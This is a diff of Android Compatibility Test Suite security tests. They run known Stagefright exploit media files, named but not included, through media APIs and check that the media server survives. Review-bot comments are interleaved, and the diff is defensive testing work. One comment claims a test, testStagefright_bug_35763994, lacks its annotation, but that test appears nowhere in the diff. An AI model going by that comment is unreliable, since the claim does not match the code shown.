         doStagefrightTest(R.raw.cve_2015_1538_3);
     }
 
+    @SecurityTest
     public void testStagefright_cve_2015_1538_4() throws Exception {
         doStagefrightTest(R.raw.cve_2015_1538_4);
     }
 
+    @SecurityTest
     public void testStagefright_cve_2015_1539() throws Exception {
         doStagefrightTest(R.raw.cve_2015_1539);
     }
 
+    @SecurityTest
     public void testStagefright_cve_2015_3824() throws Exception {
         doStagefrightTest(R.raw.cve_2015_3824);
     }
 
+    @SecurityTest
     public void testStagefright_cve_2015_3826() throws Exception {
         doStagefrightTest(R.raw.cve_2015_3826);
     }
 
+    @SecurityTest
     public void testStagefright_cve_2015_3827() throws Exception {
         doStagefrightTest(R.raw.cve_2015_3827);
     }
 
+    @SecurityTest
     public void testStagefright_cve_2015_3828() throws Exception {
         doStagefrightTest(R.raw.cve_2015_3828);
     }
 
+    @SecurityTest
     public void testStagefright_cve_2015_3829() throws Exception {
         doStagefrightTest(R.raw.cve_2015_3829);
     }
 
+    @SecurityTest
     public void testStagefright_cve_2015_3864() throws Exception {
         doStagefrightTest(R.raw.cve_2015_3864);
     }
 
+    @SecurityTest
     public void testStagefright_cve_2015_6598() throws Exception {
         doStagefrightTest(R.raw.cve_2015_6598);
     }
 
-    public void testStagefright_bug_32873375() throws Exception {
-        doStagefrightTest(R.raw.bug_32873375);
-    }
-
+    @SecurityTest
     public void testStagefright_bug_26366256() throws Exception {
         doStagefrightTest(R.raw.bug_26366256);
     }
 
+    @SecurityTest
+    public void testStagefright_cve_2016_2429_b_27211885() throws Exception {
+        doStagefrightTest(R.raw.cve_2016_2429_b_27211885);
+    }
+
+    /***********************************************************
+     to prevent merge conflicts, add M tests below this comment,
+     before any existing test methods
+     ***********************************************************/
+
+    @SecurityTest
+    public void testStagefright_bug_33818508() throws Exception {
+        doStagefrightTest(R.raw.bug_33818508);
+    }
+
+    @SecurityTest
+    public void testStagefright_bug_32873375() throws Exception {
+        doStagefrightTest(R.raw.bug_32873375);
+    }
+
+    @SecurityTest
     public void testStagefright_bug_25765591() throws Exception {
         doStagefrightTest(R.raw.bug_25765591);
     }
 
+    @SecurityTest
     public void testStagefright_bug_25812590() throws Exception {
         doStagefrightTest(R.raw.bug_25812590);
     }
 
+    @SecurityTest
     public void testStagefright_bug_26070014() throws Exception {
         doStagefrightTest(R.raw.bug_26070014);
     }
 
+    @SecurityTest
     public void testStagefright_cve_2015_3867() throws Exception {
         doStagefrightTest(R.raw.cve_2015_3867);
     }
 
+    @SecurityTest
     public void testStagefright_cve_2015_3869() throws Exception {
         doStagefrightTest(R.raw.cve_2015_3869);
     }
 
+    @SecurityTest
     public void testStagefright_bug_32322258() throws Exception {
         doStagefrightTest(R.raw.bug_32322258);
     }
 
+    @SecurityTest
     public void testStagefright_cve_2015_3873_b_23248776() throws Exception {
         doStagefrightTest(R.raw.cve_2015_3873_b_23248776);
     }
 
+    @SecurityTest
     public void testStagefright_cve_2015_3873_b_20718524() throws Exception {
         doStagefrightTest(R.raw.cve_2015_3873_b_20718524);
     }
 
+    @SecurityTest
     public void testStagefright_cve_2015_3862_b_22954006() throws Exception {
         doStagefrightTest(R.raw.cve_2015_3862_b_22954006);
     }
 
+    @SecurityTest
     public void testStagefright_cve_2015_3867_b_23213430() throws Exception {
         doStagefrightTest(R.raw.cve_2015_3867_b_23213430);
     }
 
+    @SecurityTest
     public void testStagefright_cve_2015_3873_b_21814993() throws Exception {
         doStagefrightTest(R.raw.cve_2015_3873_b_21814993);
     }
 
+    @SecurityTest
     public void testStagefright_bug_32915871() throws Exception {
         doStagefrightTest(R.raw.bug_32915871);
     }
 
+    @SecurityTest
     public void testStagefright_bug_28333006() throws Exception {
         doStagefrightTest(R.raw.bug_28333006);
     }
 
-   public void testStagefright_bug_14388161() throws Exception {
+    @SecurityTest
+    public void testStagefright_bug_14388161() throws Exception {
         doStagefrightTestMediaPlayer(R.raw.bug_14388161);
     }
 
+    @SecurityTest
+    public void testStagefright_cve_2016_3755() throws Exception {
+        doStagefrightTest(R.raw.cve_2016_3755);
+    }
+
+    @SecurityTest
+    public void testStagefright_cve_2016_3878_b_29493002() throws Exception {
+        doStagefrightTest(R.raw.cve_2016_3878_b_29493002);
+    }
+
+    @SecurityTest
+    public void testStagefright_cve_2015_6608_b_23680780() throws Exception {
+        doStagefrightTest(R.raw.cve_2015_6608_b_23680780);
+    }
+
+    @SecurityTest
     public void testStagefright_bug_27855419_CVE_2016_2463() throws Exception {
         doStagefrightTest(R.raw.bug_27855419);
     }
 
-    public void testStagefright_cve_2016_2429_b_27211885() throws Exception {
-        doStagefrightTest(R.raw.cve_2016_2429_b_27211885);
+    /***********************************************************
+     to prevent merge conflicts, add N tests below this comment,
+     before any existing test methods
+     ***********************************************************/
+
+    @SecurityTest
+    public void testStagefright_bug_35467107() throws Exception {
+        doStagefrightTest(R.raw.bug_35467107);
     }
 
     private void doStagefrightTest(final int rid) throws Exception {
         doStagefrightTestMediaPlayer(rid);
         doStagefrightTestMediaCodec(rid);
         doStagefrightTestMediaMetadataRetriever(rid);
+
+        Context context = getInstrumentation().getContext();
+        Resources resources =  context.getResources();
+        CtsTestServer server = new CtsTestServer(context);
+        String rname = resources.getResourceEntryName(rid);
+        String url = server.getAssetUrl("raw/" + rname);
+        doStagefrightTestMediaPlayer(url);
+        doStagefrightTestMediaCodec(url);
+        doStagefrightTestMediaMetadataRetriever(url);
+        server.shutdown();
     }
 
     private Surface getDummySurface() {
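Review bot: `testStagefright_bug_35763994` is the only test added in this hunk without `@SecurityTest`, so a run that filters on that annotation (the cts-sts plan added later in this commit does) would leave it out; add `@SecurityTest` above it unless the omission is deliberate. Separately, in `doStagefrightTest` the `server.shutdown()` call is reached only when all three URL-based checks return normally. A failed assertion or an exception leaves the `CtsTestServer` running for the tests that follow. Wrapping the three URL calls as `try { … } finally { server.shutdown(); }` closes it on every path.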
@@ -303,13 +394,32 @@
     }
 
     private void doStagefrightTestMediaPlayer(final int rid) throws Exception {
+        doStagefrightTestMediaPlayer(rid, null);
+    }
 
-        String name = getInstrumentation().getContext().getResources().getResourceEntryName(rid);
+    private void doStagefrightTestMediaPlayer(final String url) throws Exception {
+        doStagefrightTestMediaPlayer(-1, url);
+    }
+
+    private void closeQuietly(AutoCloseable closeable) {
+        if (closeable != null) {
+            try {
+                closeable.close();
+            } catch (RuntimeException rethrown) {
+                throw rethrown;
+            } catch (Exception ignored) {
+            }
+        }
+    }
+
+    private void doStagefrightTestMediaPlayer(final int rid, final String uri) throws Exception {
+
+        String name = uri != null ? uri :
+            getInstrumentation().getContext().getResources().getResourceEntryName(rid);
         Log.i(TAG, "start mediaplayer test for: " + name);
 
         final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
 
-
         LooperThread t = new LooperThread(new Runnable() {
             @Override
             public void run() {
@@ -320,16 +430,23 @@
                 mp.setOnCompletionListener(mpcl);
                 Surface surface = getDummySurface();
                 mp.setSurface(surface);
+                AssetFileDescriptor fd = null;
                 try {
-                    AssetFileDescriptor fd = getInstrumentation().getContext().getResources()
-                        .openRawResourceFd(rid);
+                    if (uri == null) {
+                        fd = getInstrumentation().getContext().getResources()
+                                .openRawResourceFd(rid);
 
-                    mp.setDataSource(fd.getFileDescriptor(),
-                                     fd.getStartOffset(),
-                                     fd.getLength());
+                        mp.setDataSource(fd.getFileDescriptor(),
+                                         fd.getStartOffset(),
+                                         fd.getLength());
 
+                    } else {
+                        mp.setDataSource(uri);
+                    }
                     mp.prepareAsync();
                 } catch (Exception e) {
+                } finally {
+                    closeQuietly(fd);
                 }
 
                 Looper.loop();
@@ -346,6 +463,14 @@
     }
 
     private void doStagefrightTestMediaCodec(final int rid) throws Exception {
+        doStagefrightTestMediaCodec(rid, null);
+    }
+
+    private void doStagefrightTestMediaCodec(final String url) throws Exception {
+        doStagefrightTestMediaCodec(-1, url);
+    }
+
+    private void doStagefrightTestMediaCodec(final int rid, final String url) throws Exception {
 
         final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
 
@@ -364,6 +489,7 @@
                     mp.setDataSource(fd.getFileDescriptor(),
                                      fd.getStartOffset(),
                                      fd.getLength());
+                    fd.close();
                 } catch (Exception e) {
                     // this is a known-good file, so no failure should occur
                     fail("setDataSource of known-good file failed");
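Review bot: The added `fd.close();` sits inside the `try`, so it is skipped when `setDataSource` throws, and an exception from `close()` itself would be reported as "setDataSource of known-good file failed". The same line is added in doStagefrightTestMediaMetadataRetriever (the `@@ -501,6 +645,7 @@` hunk), where `fd` is already hoisted out of the `try`. Using the helper this commit introduces, `} finally { closeQuietly(fd); }`, as doStagefrightTestMediaPlayer does, would release the descriptor on every path. The `try` starts outside this hunk, so the `fd` declaration here presumably needs hoisting as well.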
@@ -383,16 +509,21 @@
         }
 
         Resources resources =  getInstrumentation().getContext().getResources();
-        AssetFileDescriptor fd = resources.openRawResourceFd(rid);
         MediaExtractor ex = new MediaExtractor();
-        try {
-            ex.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
-        } catch (IOException e) {
-            // ignore
+        if (url == null) {
+            AssetFileDescriptor fd = resources.openRawResourceFd(rid);
+            try {
+                ex.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
+            } catch (IOException e) {
+                // ignore
+            } finally {
+                closeQuietly(fd);
+            }
+        } else {
+            ex.setDataSource(url);
         }
-        MediaCodecList codecList = new MediaCodecList(MediaCodecList.REGULAR_CODECS);
         int numtracks = ex.getTrackCount();
-        String rname = resources.getResourceEntryName(rid);
+        String rname = url != null ? url: resources.getResourceEntryName(rid);
         Log.i(TAG, "start mediacodec test for: " + rname + ", which has " + numtracks + " tracks");
         for (int t = 0; t < numtracks; t++) {
             // find all the available decoders for this format
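Review bot: The new `ex.setDataSource(url)` branch has no exception handling, while the file-descriptor branch beside it ignores `IOException`. A sample that the extractor rejects when served over HTTP would abort the method before the `MEDIA_ERROR_SERVER_DIED` check, and apparently before `thr.stopLooper()` runs. Guarding it the same way, `try { ex.setDataSource(url); } catch (IOException e) { /* ignore */ }`, keeps both paths equivalent. `retriever.setDataSource(url, new HashMap<String, String>())` in doStagefrightTestMediaMetadataRetriever has the same gap next to a branch that ignores `IllegalArgumentException`. The enclosing method starts and ends outside this hunk.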
@@ -405,13 +536,15 @@
                 continue;
             }
             String mime = format.getString(MediaFormat.KEY_MIME);
-            for (MediaCodecInfo info: codecList.getCodecInfos()) {
+            int numCodecs = MediaCodecList.getCodecCount();
+            for (int i = 0; i < numCodecs; i++) {
+                MediaCodecInfo info = MediaCodecList.getCodecInfoAt(i);
                 if (info.isEncoder()) {
                     continue;
                 }
                 try {
                     MediaCodecInfo.CodecCapabilities caps = info.getCapabilitiesForType(mime);
-                    if (caps != null && caps.isFormatSupported(format)) {
+                    if (caps != null) {
                         matchingCodecs.add(info.getName());
                     }
                 } catch (IllegalArgumentException e) {
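Review bot: The reason for dropping `caps.isFormatSupported(format)` is not recorded, so a later reader may take `if (caps != null)` for an oversight and restore the check. If the intent is to feed the sample to every decoder that advertises the MIME type, a comment such as `// try every decoder for this mime, even if it does not claim to support the format` above the condition would say so. The switch to the deprecated static `MediaCodecList.getCodecCount()` / `getCodecInfoAt(i)` deserves a one-line comment for the same reason. The loop body continues outside the hunk.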
@@ -432,16 +565,22 @@
                 if (mime.startsWith("video/")) {
                     surface = getDummySurface();
                 }
-                codec.configure(format, surface, null, 0);
-                codec.start();
+                try {
+                    codec.configure(format, surface, null, 0);
+                    codec.start();
+                } catch (Exception e) {
+                    Log.i(TAG, "Failed to start/configure:", e);
+                }
                 MediaCodec.BufferInfo info = new MediaCodec.BufferInfo();
                 try {
+                    ByteBuffer [] inputBuffers = codec.getInputBuffers();
                     while (true) {
                         int flags = ex.getSampleFlags();
                         long time = ex.getSampleTime();
+                        ex.getCachedDuration();
                         int bufidx = codec.dequeueInputBuffer(5000);
                         if (bufidx >= 0) {
-                            int n = ex.readSampleData(codec.getInputBuffer(bufidx), 0);
+                            int n = ex.readSampleData(inputBuffers[bufidx], 0);
                             if (n < 0) {
                                 flags = MediaCodec.BUFFER_FLAG_END_OF_STREAM;
                                 time = 0;
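Review bot: When `codec.configure()` or `codec.start()` throws, the new catch only logs, and execution continues into `codec.getInputBuffers()` on a codec that never started. That is harmless only because the `catch` after the decode loop swallows whatever is thrown next. Moving the two calls into the `try` that follows, whose `finally` already calls `codec.release()`, would make the skip explicit: `try { codec.configure(format, surface, null, 0); codec.start(); ByteBuffer[] inputBuffers = codec.getInputBuffers();`. The enclosing loop starts and ends outside this hunk.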
@@ -462,14 +601,8 @@
                             codec.releaseOutputBuffer(status, true);
                         }
                     }
-                } catch (MediaCodec.CodecException ce) {
-                    if (ce.getErrorCode() == MediaCodec.CodecException.ERROR_RECLAIMED) {
-                        // This indicates that the remote service is dead, suggesting a crash.
-                        throw new RuntimeException(ce);
-                    }
-                    // Other errors ignored.
-                } catch (IllegalStateException ise) {
-                    // Other errors ignored.
+                } catch (Exception e) {
+                    // local exceptions ignored, not security issues
                 } finally {
                     codec.release();
                 }
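Review bot: `catch (Exception e)` now also swallows the `CodecException` with `ERROR_RECLAIMED` that the removed code rethrew because it suggested a crash of the remote service, and nothing is logged. The verdict then rests entirely on `mpcl.waitForError()`, and a failing run leaves no trace of what the codec reported. Logging the exception, e.g. `Log.i(TAG, "codec exception ignored:", e);`, keeps the test diagnosable. If the reclaimed case is dropped on purpose, the comment should say why rather than only "not security issues". The surrounding loop starts outside this hunk.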
@@ -480,9 +613,19 @@
         assertFalse("Device *IS* vulnerable to " + cve,
                     mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
         thr.stopLooper();
-
+        thr.join();
     }
+
     private void doStagefrightTestMediaMetadataRetriever(final int rid) throws Exception {
+        doStagefrightTestMediaMetadataRetriever(rid, null);
+    }
+
+    private void doStagefrightTestMediaMetadataRetriever(final String url) throws Exception {
+        doStagefrightTestMediaMetadataRetriever(-1, url);
+    }
+
+    private void doStagefrightTestMediaMetadataRetriever(
+            final int rid, final String url) throws Exception {
 
         final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
 
@@ -492,8 +635,9 @@
 
                 MediaPlayer mp = new MediaPlayer();
                 mp.setOnErrorListener(mpcl);
+                AssetFileDescriptor fd = null;
                 try {
-                    AssetFileDescriptor fd = getInstrumentation().getContext().getResources()
+                    fd = getInstrumentation().getContext().getResources()
                         .openRawResourceFd(R.raw.good);
 
                     // the onErrorListener won't receive MEDIA_ERROR_SERVER_DIED until
@@ -501,6 +645,7 @@
                     mp.setDataSource(fd.getFileDescriptor(),
                                      fd.getStartOffset(),
                                      fd.getLength());
+                    fd.close();
                 } catch (Exception e) {
                     // this is a known-good file, so no failure should occur
                     fail("setDataSource of known-good file failed");
@@ -520,22 +665,29 @@
         }
 
         Resources resources =  getInstrumentation().getContext().getResources();
-        AssetFileDescriptor fd = resources.openRawResourceFd(rid);
         MediaMetadataRetriever retriever = new MediaMetadataRetriever();
-        try {
-            retriever.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
-        } catch (IllegalArgumentException e) {
-            // ignore
+        if (url == null) {
+            AssetFileDescriptor fd = resources.openRawResourceFd(rid);
+            try {
+                retriever.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
+            } catch (IllegalArgumentException e) {
+                // ignore
+            } finally {
+                closeQuietly(fd);
+            }
+        } else {
+            retriever.setDataSource(url, new HashMap<String, String>());
         }
         retriever.extractMetadata(MediaMetadataRetriever.METADATA_KEY_DURATION);
         retriever.getEmbeddedPicture();
         retriever.getFrameAtTime();
 
         retriever.release();
-        String rname = resources.getResourceEntryName(rid);
+        String rname = url != null ? url : resources.getResourceEntryName(rid);
         String cve = rname.replace("_", "-").toUpperCase();
         assertFalse("Device *IS* vulnerable to " + cve,
                     mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
         thr.stopLooper();
+        thr.join();
     }
 }
diff --git a/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
index b06b5a1..807412b 100644
--- a/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
+++ b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
@@ -19,13 +19,13 @@
 import junit.framework.TestCase;
 
 import android.content.Context;
+import android.platform.test.annotations.SecurityTest;
 import android.media.audiofx.AudioEffect;
 import android.media.MediaPlayer;
 import android.media.audiofx.Visualizer;
 import android.test.AndroidTestCase;
 import android.test.InstrumentationTestCase;
 import android.util.Log;
-import android.security.cts.R;
 
 import java.lang.reflect.Constructor;
 import java.lang.reflect.Method;
@@ -39,6 +39,7 @@
     }
 
     //Testing security bug: 30229821
+    @SecurityTest
     public void testVisualizer_MalformedConstructor() throws Exception {
         final String VISUALIZER_TYPE = "e46b26a0-dddd-11db-8afd-0002a5d5c51b";
         final int VISUALIZER_CMD_MEASURE = 0x10001;
diff --git a/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
index f81da6b..bbc70a9 100644
--- a/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
+++ b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
@@ -18,6 +18,7 @@
 
 import android.graphics.Bitmap;
 import android.graphics.BitmapFactory;
+import android.platform.test.annotations.SecurityTest;
 import android.test.AndroidTestCase;
 
 import java.io.InputStream;
@@ -31,6 +32,7 @@
      * Prior to fixing bug 33300701, decoding resulted in undefined behavior (divide by zero).
      * With the fix, decoding will fail, without dividing by zero.
      */
+    @SecurityTest
     public void test_android_bug_33300701() {
         InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33300701);
         Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
diff --git a/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java b/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java
old mode 100755
new mode 100644
index b896229..3e071b6
--- a/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java
+++ b/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java
@@ -25,10 +25,7 @@
 import android.content.pm.ServiceInfo;
 import android.content.res.Resources;
 import android.os.Parcel;
-import android.os.ParcelFileDescriptor;
-import android.support.test.InstrumentationRegistry;
 import android.test.AndroidTestCase;
-import android.text.TextUtils;
 import android.util.Printer;
 import android.view.inputmethod.InputMethod;
 import android.view.inputmethod.InputMethodInfo;
@@ -37,10 +34,7 @@
 
 import org.xmlpull.v1.XmlPullParserException;
 
-import java.io.BufferedReader;
 import java.io.IOException;
-import java.io.InputStreamReader;
-import java.nio.charset.StandardCharsets;
 import java.util.ArrayList;
 import java.util.Arrays;
 import java.util.List;
@@ -249,11 +243,6 @@
             return;
         }
 
-        if (!TextUtils.equals("native", getFbeMode())) {
-            // Skip the test unless the device is in native FBE mode.
-            return;
-        }
-
         final InputMethodManager imm = mContext.getSystemService(InputMethodManager.class);
         final List<InputMethodInfo> imis = imm.getInputMethodList();
         boolean hasEncryptionAwareInputMethod = false;
@@ -279,22 +268,4 @@
         public void println(String x) {
         }
     }
-
-    private String getFbeMode() {
-        try (ParcelFileDescriptor.AutoCloseInputStream in =
-                     new ParcelFileDescriptor.AutoCloseInputStream(
-                             InstrumentationRegistry
-                            .getInstrumentation()
-                            .getUiAutomation()
-                            .executeShellCommand("sm get-fbe-mode"))) {
-            try (BufferedReader br =
-                         new BufferedReader(new InputStreamReader(in, StandardCharsets.UTF_8))) {
-                // Assume that the output of "sm get-fbe-mode" is always one-line.
-                final String line = br.readLine();
-                return line != null ? line.trim() : "";
-            }
-        } catch (IOException e) {
-            return "";
-        }
-    }
 }
diff --git a/tools/cts-tradefed/Android.mk b/tools/cts-tradefed/Android.mk
index c447ce8..e0f6193 100644
--- a/tools/cts-tradefed/Android.mk
+++ b/tools/cts-tradefed/Android.mk
@@ -25,7 +25,7 @@
 LOCAL_SUITE_TARGET_ARCH := $(TARGET_ARCH)
 LOCAL_SUITE_NAME := CTS
 LOCAL_SUITE_FULLNAME := "Compatibility Test Suite"
-LOCAL_SUITE_VERSION := 7.0_r8
+LOCAL_SUITE_VERSION := 7.0_r201705s
 
 LOCAL_MODULE := cts-tradefed
 
diff --git a/tools/cts-tradefed/res/config/cts-dev.xml b/tools/cts-tradefed/res/config/cts-dev.xml
new file mode 100644
index 0000000..0cf53ca
--- /dev/null
+++ b/tools/cts-tradefed/res/config/cts-dev.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+     Licensed under the Apache License, Version 2.0 (the "License");
+     you may not use this file except in compliance with the License.
+     You may obtain a copy of the License at
+
+          http://www.apache.org/licenses/LICENSE-2.0
+
+     Unless required by applicable law or agreed to in writing, software
+     distributed under the License is distributed on an "AS IS" BASIS,
+     WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+     See the License for the specific language governing permissions and
+     limitations under the License.
+-->
+<configuration description="Runs CTS with common options set developer workflow: skips most checks">
+
+    <include name="cts" />
+
+    <option name="log-level" value="verbose" />
+    <option name="skip-preconditions" value="true" />
+    <option name="skip-device-info" value="true" />
+
+    <option name="compatibility:plan" value="cts-dev" />
+    <option name="compatibility:skip-all-system-status-check" value="true" />
+    <option name="compatibility:primary-abi-only" value="true" />
+
+</configuration>
diff --git a/tools/cts-tradefed/res/config/cts-sts.xml b/tools/cts-tradefed/res/config/cts-sts.xml
new file mode 100644
index 0000000..8e4c030
--- /dev/null
+++ b/tools/cts-tradefed/res/config/cts-sts.xml
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+     Licensed under the Apache License, Version 2.0 (the "License");
+     you may not use this file except in compliance with the License.
+     You may obtain a copy of the License at
+
+          http://www.apache.org/licenses/LICENSE-2.0
+
+     Unless required by applicable law or agreed to in writing, software
+     distributed under the License is distributed on an "AS IS" BASIS,
+     WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+     See the License for the specific language governing permissions and
+     limitations under the License.
+-->
+<configuration description="Runs Security Patch test cases">
+
+    <option name="plan" value="cts-sts" />
+
+    <include name="cts"/>
+
+    <option name="compatibility:include-filter" value="CtsSecurityTestCases" />
+
+    <option name="compatibility:include-filter" value="CtsSecurityHostTestCases" />
+
+    <!-- Only run tests with @SecurityTest annotation. -->
+    <option name="compatibility:module-arg" value="CtsSecurityHostTestCases:include-annotation:android.platform.test.annotations.SecurityTest"/>
+
+    <option name="compatibility:test-arg" value="com.android.tradefed.testtype.AndroidJUnitTest:include-annotation:android.platform.test.annotations.SecurityTest" />
+
+</configuration>
diff --git a/tools/tradefed-host/src/com/android/cts/tradefed/build/CtsBuildProvider.java b/tools/tradefed-host/src/com/android/cts/tradefed/build/CtsBuildProvider.java
index 6385139..2463f87 100644
--- a/tools/tradefed-host/src/com/android/cts/tradefed/build/CtsBuildProvider.java
+++ b/tools/tradefed-host/src/com/android/cts/tradefed/build/CtsBuildProvider.java
@@ -48,7 +48,7 @@
     @Option(name="branch", description="build branch name to supply.")
     private String mBranch = null;
 
-    public static final String CTS_BUILD_VERSION = "7.0_r3";
+    public static final String CTS_BUILD_VERSION = "7.0_r201701s";
     public static final String CTS_PACKAGE = "com.android.cts.tradefed.testtype";
 
     /**
diff --git a/tools/tradefed-host/src/com/android/cts/tradefed/util/ReportLogUtil.java b/tools/tradefed-host/src/com/android/cts/tradefed/util/ReportLogUtil.java
index 6ab175f..9233a4a 100644
--- a/tools/tradefed-host/src/com/android/cts/tradefed/util/ReportLogUtil.java
+++ b/tools/tradefed-host/src/com/android/cts/tradefed/util/ReportLogUtil.java
@@ -43,7 +43,6 @@
             // Delete earlier report logs if present on device.
             String command = String.format("adb -s %s shell rm -rf %s", device.getSerialNumber(),
                     SRC_DIR);
-            CLog.e(command);
             if (device.doesFileExist(SRC_DIR)) {
                 Process process = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c",
                         command});